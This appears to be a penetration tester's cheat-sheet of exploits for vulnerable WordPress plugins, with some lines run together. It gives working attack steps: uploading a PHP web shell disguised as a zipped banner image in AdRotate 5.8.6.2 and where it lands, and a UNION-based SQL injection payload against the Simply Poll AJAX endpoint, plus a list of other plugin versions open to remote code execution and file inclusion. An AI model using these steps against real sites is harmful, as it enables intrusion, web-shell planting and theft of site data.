wordpress plugin exploits
adRotate 5.8.6.2
# can upload shell as zip as image banner
# banner images are auto extracted to /banner folder
# use plugin settings to find where the /banner folder is
# mostly /var/www/html/wordpress/wp-content/banners
wp-content/banners/web.phpsimply-poll-master 1.4.1 | 1.5 |
# POST http://example.com/wp-admin/admin-ajax.php
# --data="action=spAjaxResults&pollid=1 UNION SELECT 1,2,3,4,5,6,7 --"
# pollid is injectable
# UNION query : 7 columns; 6th in injectablesimple-file-list 4.2.2 | RCE
site-import 1.0.1 | LFI + RFI
wp-support-plus-responsive-ticket-system 7.1.3
social warfare < 3.5.3
Last updated